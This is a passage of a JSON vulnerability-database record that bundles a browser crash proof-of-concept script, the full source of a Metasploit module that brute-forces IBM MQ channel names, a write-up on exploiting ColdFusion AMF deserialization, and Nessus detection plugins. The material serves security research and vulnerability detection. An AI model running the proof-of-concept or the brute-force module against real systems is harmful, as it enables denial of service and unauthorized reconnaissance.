POC </title>\r\n</head>\r\n<script>\r\n \r\nvar a = '0x42424242,'.repeat(0xFFFF-2); \r\nvar b = \"function Car(){} var car = new Car(a,\"+a+\"a);\";\r\neval(b);\r\n \r\n</script>\r\n</html>\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28299"}], "metasploit": [{"lastseen": "2019-04-10T18:04:59", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! @common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}], "seebug": [{"lastseen": "2018-03-31T18:25:41", "bulletinFamily": "exploit", "description": "### Exploiting Adobe ColdFusion before CVE-2017-3066\r\nIn a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me whether I had an idea how he could still get a SYSTEM shell and the outcome of the short research effort is documented here.\r\n\r\n### INTRODUCTION ADOBE COLDFUSION & AMF\r\nBefore we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an Application Development Platform like ASP.net, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).\r\n\r\nThe AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies. Several data types are supported in AMF0 and AMF3. For example the AMF3 format supports the following protocol elements with their type identifier:\r\n```\r\nUndefined - 0x00\r\nNull - 0x01\r\nBoolean - 0x02\r\nBoolean - 0x03\r\nInteger - 0x04\r\nDouble - 0x05\r\nString - 0x06\r\nXML - 0x07\r\nDate - 0x08\r\nArray - 0x09\r\nObject - 0x0A\r\nXML End - 0x0B\r\nByteArray - 0x0C\r\n```\r\n\r\nDetails about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see https://en.wikipedia.org/wiki/Action_Message_Format).\r\n\r\nThere are several implementations for AMF in different languages. For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used in Adobe ColdFusion.\r\n\r\nThe BlazeDS AMF serializer can serialize complex object graphs. The serializer starts with the root object and serializes its members recursively.\r\n\r\nTwo general serialization techniques are supported by BlazeDS to serialize complex objects:\r\n* Serialization of Bean Properties (AMF0 and AMF3)\r\n* Serialization using Java's java.io.Externalizable interface. (AMF3)\r\n\r\n### Serialization of Bean Properties\r\nThis technique requires the object to be serialized to have a public no-arg constructor and for every member public Getter-and Setter-Methods (JavaBeans convention).\r\n\r\nIn order to collect all member values of an object, the AMF serializer invokes all Getter-methods during serialization. The member names and values are put in the Action message body with the class name of the object.\r\n\r\nDuring deserialization, the classname is taken from the Action Message, a new object is constructed and for every member name the corresponding set method is called with the value as argument. This all happens either in method readScriptObject() of class flex.messaging.io.amf.Amf3Input or readObjectValue() of class flex.messaging.io.amf.Amf0Input.\r\n\r\n### Serialization using Java's java.io.Externalizable interface\r\nBlazeDS further supports serialization of complex objects of classes implementing the java.io.Externalizable interface which inherits from java.io.Serializable.\r\n```\r\npublic abstract interface Externalizable\r\n extends Serializable\r\n{\r\n public abstract void writeExternal(ObjectOutput paramObjectOutput)\r\n throws IOException;\r\n\r\n public abstract void readExternal(ObjectInput paramObjectInput)\r\n throws IOException, ClassNotFoundException;\r\n}\r\n```\r\n\r\nEvery class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput-implementation to read serialized primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).\r\n\r\nDuring deserialization of an object (type 0xa) in AMF3, the method readScriptObject() of class flex.messaging.io.amf.Amf3Input gets called. In line #759 the method readExternalizable is invoked which calls the readExternal() method on the object to be deserialized.\r\n```\r\n/* */ protected Object readScriptObject()\r\n/* */ throws ClassNotFoundException, IOException\r\n/* */ {\r\n/* 736 */ int ref = readUInt29();\r\n/* */ \r\n/* 738 */ if ((ref & 0x1) == 0) {\r\n/* 739 */ return getObjectReference(ref >> 1);\r\n/* */ }\r\n/* 741 */ TraitsInfo ti = readTraits(ref);\r\n/* 742 */ String className = ti.getClassName();\r\n/* 743 */ boolean externalizable = ti.isExternalizable();\r\n/* */ \r\n/* */\r\n/* */\r\n/* 747 */ Object[] params = { className, null };\r\n/* 748 */ Object object = createObjectInstance(params);\r\n/* */ \r\n/* */\r\n/* 751 */ className = (String)params[0];\r\n/* 752 */ PropertyProxy proxy = (PropertyProxy)params[1];\r\n/* */ \r\n/* */\r\n/* 755 */ int objectId = rememberObject(object);\r\n/* */ \r\n/* 757 */ if (externalizable)\r\n/* */ {\r\n/* 759 */ readExternalizable(className, object); //<- call to readExternal\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nThis should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.\r\n\r\n### PREVIOUS WORK\r\nChris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.\r\n\r\nWouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.\r\n\r\nLooking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.\r\n\r\nThe most recent ones are:\r\n* Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)\r\n* XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)\r\n* XXE (CVE-2016-4264 by @dawid_golunski)\r\n\r\n### CVE-2017-3066\r\nIn 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered independently the vulnerability CVE-2017-3066 in Apache BlazeDS.\r\n\r\nThe core problem of this vulnerability was that Adobe Coldfusion never did any whitelisting of allowed classes. Thus any class in the classpath of Adobe ColdFusion, which either fulfills the Java Beans Convention or implements java.io.Externalizable could be sent to the server and get deserialized. Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface and triggered an outgoing TCP connection during AMF3 deserialization. After the connection was made to the attacker's server, its response was deserialized using Java's native deserialization using ObjectInputStream.readObject().\r\n\r\nBoth found a great \"bridge\" from AMF deserialization to Java's native deserialization which offers well known exploitation primitives using public gadgets. Details about the vulnerability can also be found in Markus' blog post. \r\n\r\nApache introduced validation through the class flex.messaging.validators.ClassDeserializationValidator. It has a default whitelist but can also be configured with a configuration file. For details see the Apache BlazeDS release notes.\r\n\r\n### FINDING EXPLOITATION PRIMITIVES BEFORE CVE-2017-3066\r\nAs already mentioned in the very beginning my teammate Thomas required an exploit which also works without outgoing connection.\r\n\r\nI had a quick look into the excellent research paper \"Java Unmarshaller Security\" of Moritz Bechler where he analysed several \"Unmarshallers\" including BlazeDS. The exploitation payloads he discovered weren't applicable since the libraries were missing in the classpath.\r\n\r\nSo I started with my typical approach, fired up my favorite \"reverse engineering tool\" when it comes to Java, Eclipse. Eclipse together with the powerful decompiler plugin \"JD-Eclipse\" (https://github.com/java-decompiler/jd-eclipse) is all you need for static and dynamic analysis. As a former Dev I was used to work with IDE's which make your life easier and decompiling and grepping through code is often very inefficient and error prone. So I created a new Java project and added all jar-files of Adobe Coldfusion 12 as external libraries.\r\n\r\nThe first idea was to look for further calls to Java's ObjectInputStream.readObject-method. Using Eclipse this is very easy. Just open class ObjectInputStream, right click on the readObject() method and click \"Open Call Hierarchy\". Thanks to JD-Eclipse and its decompiler, Eclipse is able to construct call graphs based on class information without having any source. The call graph looks big in the very beginning. But with some experience you see very quickly which nodes in the graph are interesting.\r\n\r\nAfter some hours I found two promising call graphs.\r\n\r\n### SETTER-BASED EXPLOIT\r\nThe first one starts with method setState(byte[] new_state) of class org.jgroups.blocks.ReplicatedTree.\r\n\r\n\r\n\r\n\r\nLooking at the implementation of this method, we already can imagine what is happening in line #605.\r\n```\r\n/* */ public void setState(byte[] new_state)\r\n/* */ {\r\n/* 597 */ Node new_root = null;\r\n/* */ \r\n/* */\r\n/* 600 */ if (new_state == null) {\r\n/* 601 */ if (log.isInfoEnabled()) log.info(\"new cache is null\");\r\n/* 602 */ return;\r\n/* */ }\r\n/* */ try {\r\n/* 605 */ Object obj = Util.objectFromByteBuffer(new_state);\r\n/* 606 */ new_root = (Node)((Node)obj).clone();\r\n/* 607 */ root = new_root;\r\n/* 608 */ notifyAllNodesCreated(root);\r\n/* */ }\r\n/* */ catch (Throwable ex) {\r\n/* 611 */ if (log.isErrorEnabled()) { log.error(\"could not set cache: \" + ex);\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\nA quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().\r\n\r\nThe only thing to mention here is that the byte[] passed to setState() needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364 of class org.jgroups.util.Util.\r\n```\r\n/* */ public static Object objectFromByteBuffer(byte[] buffer, int offset, int length) throws Exception\r\n/* */ {\r\n/* 358 */ if (buffer == null) return null;\r\n/* 359 */ if (JGROUPS_COMPAT)\r\n/* 360 */ return oldObjectFromByteBuffer(buffer, offset, length);\r\n/* 361 */ Object retval = null;\r\n/* 362 */ InputStream in = null;\r\n/* 363 */ ByteArrayInputStream in_stream = new ByteArrayInputStream(buffer, offset, length);\r\n/* 364 */ byte b = (byte)in_stream.read();\r\n/* */ try {\r\n/* */ int len;\r\n/* 367 */ switch (b) {\r\n/* */ case 0:\r\n/* 369 */ return null;\r\n/* */ case 1:\r\n/* 371 */ in = new DataInputStream(in_stream);\r\n/* 372 */ retval = readGenericStreamable((DataInputStream)in);\r\n/* 373 */ break;\r\n/* */ case 2:\r\n/* 375 */ in = new ObjectInputStream(in_stream);\r\n/* 376 */ retval = ((ObjectInputStream)in).readObject();\r\n/* */ //...\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\n\r\nThe exploit can be found in the following image.\r\n\r\n\r\n\r\nThe exploit works against Adobe ColdFusion 12 only since JGroups is only available in this specific version.\r\n\r\n### EXTERNALIZABLE-BASED EXPLOIT\r\nThe second call graph starts in class org.apache.axis2.util.MetaDataEntry with a call to readExternal which is what we are looking for.\r\n\r\n\r\n\r\n\r\nIn line #297 we have a call to SafeObjectInputStream.install(inObject).\r\n```\r\n/* */ public static SafeObjectInputStream install(ObjectInput in)\r\n/* */ {\r\n/* 62 */ if ((in instanceof SafeObjectInputStream)) {\r\n/* 63 */ return (SafeObjectInputStream)in;\r\n/* */ }\r\n/* 65 */ return new SafeObjectInputStream(in) ;\r\n/* */ }\r\nview rawsnippet_org.apache.axis2.context.externalize.SafeObjectInputStream.java hosted with \u2764 by GitHub\r\nIn this function our AMF3Input instance gets wrapped by a org.apache.axis2.context.externalize.SafeObjectInputStream instance.\r\n/* */ private Object readObjectOverride()\r\n/* */ throws IOException, ClassNotFoundException\r\n/* */ {\r\n/* 318 */ boolean isActive = in.readBoolean();\r\n/* 319 */ if (!isActive) {\r\n/* 320 */ if (isDebug) {\r\n/* 321 */ log.debug(\"Read object=null\");\r\n/* */ }\r\n/* 323 */ return null;\r\n/* */ }\r\n/* 325 */ Object obj = null;\r\n/* 326 */ boolean isObjectForm = in.readBoolean();\r\n/* 327 */ if (isObjectForm)\r\n/* */ {\r\n/* 329 */ if (isDebug) {\r\n/* 330 */ log.debug(\" reading using object form\");\r\n/* */ }\r\n/* 332 */ obj = in.readObject();\r\n/* */ } else {\r\n/* 334 */ if (isDebug) {\r\n/* 335 */ log.debug(\" reading using byte form\");\r\n/* */ }\r\n/* */ \r\n/* 338 */ ByteArrayInputStream bais = getByteStream(in);\r\n/* */ \r\n/* */\r\n/* 341 */ ObjectInputStream tempOIS = createObjectInputStream(bais);\r\n/* 342 */ obj = tempOIS.readObject();\r\n/* 343 */ tempOIS.close();\r\n/* 344 */ bais.close();\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nIn line #341 a new instance of class org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created. This class just extends the standard java.io.ObjectInputStream. In line #342 we finally have our call to readObject().\r\nThe following image shows the request for the exploit. \r\n\r\n\r\n\r\nThe exploit works against Adobe ColdFusion 11 and 12. \r\n\r\n### COLDFUSIONPWN\r\nTo make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.\r\n\r\n### TAKEAWAYS\r\nDeserializing untrusted input is bad, that's for sure. From an exploiters perspective exploiting deserialization vulnerabilities is a challenging task since you need to find the \"right\" objects (gadgets) which trigger functionality you can reuse for exploitation. But it's also more fun :-)\r\n\r\nBy the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization vulnerabilities and how to do proper static and dynamic analysis in Java, you might be interested in our upcoming \"Advanced Java Exploitation\" course.", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97208", "id": "SSV:97208", "title": "Adobe ColdFusion \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2017-3066\uff09", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "nessus": [{"lastseen": "2018-09-01T23:51:17", "bulletinFamily": "scanner", "description": "New python packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.", "modified": "2017-09-25T00:00:00", "published": "2017-09-25T00:00:00", "id": "SLACKWARE_SSA_2017-266-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103424", "title": "Slackware 14.0 / 14.1 / 14.2 / current : python (SSA:2017-266-02)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-266-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103424);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/09/25 13:28:56 $\");\n\n script_cve_id(\"CVE-2016-0718\", \"CVE-2016-4472\", \"CVE-2016-9063\", \"CVE-2017-9233\");\n script_xref(name:\"SSA\", value:\"2017-266-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : python (SSA:2017-266-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New python packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.436421\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e0c1fdd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:33:00", "bulletinFamily": "scanner", "description": "An out-of-bounds read flaw was found in the way Expat processed certain input. A remote attacker could send specially crafted XML that, when parsed by an application using the Expat library, would cause that application to crash or, possibly, execute arbitrary code with the permission of the user running the application.(CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed by an application using the Expat library, would cause that application to stop responding orpossiblyrun arbitrary code with the permission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web Application Security Editor,can exploit the vulnerability and gain full control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over the management port and self IP addresses when the Port Lockdown setting is set to Default , All , or Custom with TCP port 4353 included. The impact for the big3d process is a temporary disruption in the communicationbetween peer systems until the system automatically restarts the big3d process.", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL52320548.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103313", "published": "2017-09-19T00:00:00", "title": "F5 Networks BIG-IP : Expat vulnerability (K52320548)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K52320548.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103313);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/01/04 10:03:41\");\n\n script_cve_id(\"CVE-2016-0718\");\n\n script_name(english:\"F5 Networks BIG-IP : Expat vulnerability (K52320548)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An out-of-bounds read flaw was found in the way Expat processed\ncertain input. A remote attacker could send specially crafted XML\nthat, when parsed by an application using the Expat library, would\ncause that application to crash or, possibly, execute arbitrary code\nwith the permission of the user running the\napplication.(CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed\nby an application using the Expat library, would cause that\napplication to stop responding orpossiblyrun arbitrary code with the\npermission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web\nApplication Security Editor,can exploit the vulnerability and gain\nfull control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over\nthe management port and self IP addresses when the Port Lockdown\nsetting is set to Default , All , or Custom with TCP port 4353\nincluded. The impact for the big3d process is a temporary disruption\nin the communicationbetween peer systems until the system\nautomatically restarts the big3d process.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K52320548\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K52320548.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n 